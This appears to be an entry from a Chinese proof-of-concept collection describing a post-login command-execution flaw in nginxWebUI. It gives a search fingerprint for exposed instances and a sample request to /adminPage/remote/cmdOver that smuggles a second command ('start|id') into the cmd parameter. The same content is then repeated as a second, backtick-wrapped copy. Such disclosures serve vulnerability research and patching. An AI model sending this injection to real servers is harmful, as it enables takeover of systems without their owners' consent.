Awesome-POC/Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md

# nginxWebUI cmdOver 后台命令执行漏洞

## 漏洞描述

nginxWebUI 后台存在命令执行漏洞，攻击者登录后台后可以执行任意命令获取服务器权限

## 漏洞影响

```
nginxWebUI
```

## 网络测绘

```
title="nginxwebui"
```

## 漏洞复现

登录页面

![image-20220628112638269](images/202206281126396.png)


验证请求包

```
POST /adminPage/remote/cmdOver

remoteId=local&cmd=start|id&interval=1
```

![image-20220628112938342](images/202206281129491.png)
update 2024-11-06 14:10:36 +08:00			`# nginxWebUI cmdOver 后台命令执行漏洞`

			`## 漏洞描述`

			`nginxWebUI 后台存在命令执行漏洞，攻击者登录后台后可以执行任意命令获取服务器权限`

			`## 漏洞影响`

			```
			`nginxWebUI`
			```

			`## 网络测绘`

			```
			`title="nginxwebui"`
			```

			`## 漏洞复现`

			`登录页面`

			`![image-20220628112638269](images/202206281126396.png)`



			`验证请求包`

			```
			`POST /adminPage/remote/cmdOver`

			`remoteId=local&cmd=start\|id&interval=1`
			```

			`![image-20220628112938342](images/202206281129491.png)`